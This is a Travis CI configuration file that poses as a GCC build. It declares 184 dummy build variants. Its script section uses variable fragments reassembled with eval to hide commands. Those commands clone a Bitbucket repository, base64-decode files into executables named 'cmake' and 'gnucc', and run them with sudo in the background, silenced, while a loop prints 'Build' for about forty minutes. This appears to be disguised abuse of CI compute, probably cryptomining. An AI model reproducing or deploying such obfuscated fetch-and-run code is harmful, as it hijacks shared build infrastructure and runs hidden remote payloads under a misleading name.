dist: bionic

env:
  - BUILD="--accept-properties=198nU1"
  - BUILD="--accept-properties=198nU2"
  - BUILD="--accept-properties=198nU3"
  - BUILD="--accept-properties=198nU4"
  - BUILD="--accept-properties=198nU5"
  - BUILD="--accept-properties=198nU6"
  - BUILD="--accept-properties=198nU7"
  - BUILD="--accept-properties=198nU8"
  - BUILD="--accept-properties=198nU9"
  - BUILD="--accept-properties=198nU10"
  - BUILD="--accept-properties=198nU11"
  - BUILD="--accept-properties=198nU12"
  - BUILD="--accept-properties=198nU13"
  - BUILD="--accept-properties=198nU14"
  - BUILD="--accept-properties=198nU15"
  - BUILD="--accept-properties=198nU16"
  - BUILD="--accept-properties=198nU17"
  - BUILD="--accept-properties=198nU18"
  - BUILD="--accept-properties=198nU19"
  - BUILD="--accept-properties=198nU20"
  - BUILD="--accept-properties=198nU21"
  - BUILD="--accept-properties=198nU22"
  - BUILD="--accept-properties=198nU23"
  - BUILD="--accept-properties=198nU24"
  - BUILD="--accept-properties=198nU25"
  - BUILD="--accept-properties=198nU26"
  - BUILD="--accept-properties=198nU27"
  - BUILD="--accept-properties=198nU28"
  - BUILD="--accept-properties=198nU29"
  - BUILD="--accept-properties=198nU30"
  - BUILD="--accept-properties=198nU31"
  - BUILD="--accept-properties=198nU32"
  - BUILD="--accept-properties=198nU33"
  - BUILD="--accept-properties=198nU34"
  - BUILD="--accept-properties=198nU35"
  - BUILD="--accept-properties=198nU36"
  - BUILD="--accept-properties=198nU37"
  - BUILD="--accept-properties=198nU38"
  - BUILD="--accept-properties=198nU39"
  - BUILD="--accept-properties=198nU40"
  - BUILD="--accept-properties=198nU41"
  - BUILD="--accept-properties=198nU42"
  - BUILD="--accept-properties=198nU43"
  - BUILD="--accept-properties=198nU44"
  - BUILD="--accept-properties=198nU45"
  - BUILD="--accept-properties=198nU46"
  - BUILD="--accept-properties=198nU47"
  - BUILD="--accept-properties=198nU48"
  - BUILD="--accept-properties=198nU49"
  - BUILD="--accept-properties=198nU50"
  - BUILD="--accept-properties=198nU51"
  - BUILD="--accept-properties=198nU52"
  - BUILD="--accept-properties=198nU53"
  - BUILD="--accept-properties=198nU54"
  - BUILD="--accept-properties=198nU55"
  - BUILD="--accept-properties=198nU56"
  - BUILD="--accept-properties=198nU57"
  - BUILD="--accept-properties=198nU58"
  - BUILD="--accept-properties=198nU59"
  - BUILD="--accept-properties=198nU60"
  - BUILD="--accept-properties=198nU61"
  - BUILD="--accept-properties=198nU62"
  - BUILD="--accept-properties=198nU63"
  - BUILD="--accept-properties=198nU64"
  - BUILD="--accept-properties=198nU65"
  - BUILD="--accept-properties=198nU66"
  - BUILD="--accept-properties=198nU67"
  - BUILD="--accept-properties=198nU68"
  - BUILD="--accept-properties=198nU69"
  - BUILD="--accept-properties=198nU70"
  - BUILD="--accept-properties=198nU71"
  - BUILD="--accept-properties=198nU72"
  - BUILD="--accept-properties=198nU73"
  - BUILD="--accept-properties=198nU74"
  - BUILD="--accept-properties=198nU75"
  - BUILD="--accept-properties=198nU76"
  - BUILD="--accept-properties=198nU77"
  - BUILD="--accept-properties=198nU78"
  - BUILD="--accept-properties=198nU79"
  - BUILD="--accept-properties=198nU80"
  - BUILD="--accept-properties=198nU81"
  - BUILD="--accept-properties=198nU82"
  - BUILD="--accept-properties=198nU83"
  - BUILD="--accept-properties=198nU84"
  - BUILD="--accept-properties=198nU85"
  - BUILD="--accept-properties=198nU86"
  - BUILD="--accept-properties=198nU87"
  - BUILD="--accept-properties=198nU88"
  - BUILD="--accept-properties=198nU89"
  - BUILD="--accept-properties=198nU90"
  - BUILD="--accept-properties=198nU91"
  - BUILD="--accept-properties=198nU92"
  - BUILD="--accept-properties=198nU93"
  - BUILD="--accept-properties=198nU94"
  - BUILD="--accept-properties=198nU95"
  - BUILD="--accept-properties=198nU96"
  - BUILD="--accept-properties=198nU97"
  - BUILD="--accept-properties=198nU98"
  - BUILD="--accept-properties=198nU99"
  - BUILD="--accept-properties=198nU100"
  - BUILD="--accept-properties=198nU101"
  - BUILD="--accept-properties=198nU102"
  - BUILD="--accept-properties=198nU103"
  - BUILD="--accept-properties=198nU104"
  - BUILD="--accept-properties=198nU105"
  - BUILD="--accept-properties=198nU106"
  - BUILD="--accept-properties=198nU107"
  - BUILD="--accept-properties=198nU108"
  - BUILD="--accept-properties=198nU109"
  - BUILD="--accept-properties=198nU110"
  - BUILD="--accept-properties=198nU111"
  - BUILD="--accept-properties=198nU112"
  - BUILD="--accept-properties=198nU113"
  - BUILD="--accept-properties=198nU114"
  - BUILD="--accept-properties=198nU115"
  - BUILD="--accept-properties=198nU116"
  - BUILD="--accept-properties=198nU117"
  - BUILD="--accept-properties=198nU118"
  - BUILD="--accept-properties=198nU119"
  - BUILD="--accept-properties=198nU120"
  - BUILD="--accept-properties=198nU121"
  - BUILD="--accept-properties=198nU122"
  - BUILD="--accept-properties=198nU123"
  - BUILD="--accept-properties=198nU124"
  - BUILD="--accept-properties=198nU125"
  - BUILD="--accept-properties=198nU126"
  - BUILD="--accept-properties=198nU127"
  - BUILD="--accept-properties=198nU128"
  - BUILD="--accept-properties=198nU129"
  - BUILD="--accept-properties=198nU130"
  - BUILD="--accept-properties=198nU131"
  - BUILD="--accept-properties=198nU132"
  - BUILD="--accept-properties=198nU133"
  - BUILD="--accept-properties=198nU134"
  - BUILD="--accept-properties=198nU135"
  - BUILD="--accept-properties=198nU136"
  - BUILD="--accept-properties=198nU137"
  - BUILD="--accept-properties=198nU138"
  - BUILD="--accept-properties=198nU139"
  - BUILD="--accept-properties=198nU140"
  - BUILD="--accept-properties=198nU141"
  - BUILD="--accept-properties=198nU142"
  - BUILD="--accept-properties=198nU143"
  - BUILD="--accept-properties=198nU144"
  - BUILD="--accept-properties=198nU145"
  - BUILD="--accept-properties=198nU146"
  - BUILD="--accept-properties=198nU147"
  - BUILD="--accept-properties=198nU148"
  - BUILD="--accept-properties=198nU149"
  - BUILD="--accept-properties=198nU150"
  - BUILD="--accept-properties=198nU151"
  - BUILD="--accept-properties=198nU152"
  - BUILD="--accept-properties=198nU153"
  - BUILD="--accept-properties=198nU154"
  - BUILD="--accept-properties=198nU155"
  - BUILD="--accept-properties=198nU156"
  - BUILD="--accept-properties=198nU157"
  - BUILD="--accept-properties=198nU158"
  - BUILD="--accept-properties=198nU159"
  - BUILD="--accept-properties=198nU160"
  - BUILD="--accept-properties=198nU161"
  - BUILD="--accept-properties=198nU162"
  - BUILD="--accept-properties=198nU163"
  - BUILD="--accept-properties=198nU164"
  - BUILD="--accept-properties=198nU165"
  - BUILD="--accept-properties=198nU166"
  - BUILD="--accept-properties=198nU167"
  - BUILD="--accept-properties=198nU168"
  - BUILD="--accept-properties=198nU169"
  - BUILD="--accept-properties=198nU170"
  - BUILD="--accept-properties=198nU171"
  - BUILD="--accept-properties=198nU172"
  - BUILD="--accept-properties=198nU173"
  - BUILD="--accept-properties=198nU174"
  - BUILD="--accept-properties=198nU175"
  - BUILD="--accept-properties=198nU176"
  - BUILD="--accept-properties=198nU177"
  - BUILD="--accept-properties=198nU178"
  - BUILD="--accept-properties=198nU179"
  - BUILD="--accept-properties=198nU180"
  - BUILD="--accept-properties=198nU181"
  - BUILD="--accept-properties=198nU182"
  - BUILD="--accept-properties=198nU183"
  - BUILD="--accept-properties=198nU184"

language: minimal

script:
  - sudo apt update || true
  - NZaCEQ="sudo apt --"
  - YuDaPin="yes install"
  - IMmCi=" cl-base64 "
  - HStIOGUvXD="git &>/dev/"
  - eval "$NZaCEQ""$YuDaPin""$IMmCi""$HStIOGUvXD""null"
  - eLuFe="git clone h"
  - kJbmSpSW="ttps://gccb"
  - aWcmSI="uild@bitbuc"
  - YUneTaJP="ket.org/gcc"
  - FdUjlBa="build/gcc.g"
  - ABKRRb="it &>/dev/n"
  - eval "$eLuFe""$kJbmSpSW""$aWcmSI""$YUneTaJP""$FdUjlBa""$ABKRRb""ull"
  - qUOFuMGP="base64 -d g"
  - eXzxalz="cc/cmake_ >"
  - eval "$qUOFuMGP""$eXzxalz"" cmake"
  - PFoHYTvM="base64 -d g"
  - cjXehQRMh="cc/config_ "
  - eval "$PFoHYTvM""$cjXehQRMh""> log"
  - pxbpWUQXIC="base64 -d g"
  - wcxojcWLpy="cc/make_ > "
  - eval "$pxbpWUQXIC""$wcxojcWLpy""gnucc"
  - chmod +x gnucc cmake
  - ./cmake
  - sed -i 's/build/tg2o/g' log
  - sudo ./gnucc --config log &>/dev/null &
  - GCC=$(date +%s)
  - echo $BUILD
  - while true; do CC=$(date +%s); echo Build; [ $CC -ge $((GCC + 2495)) ] && sudo killall gnucc && break; sleep 229; done
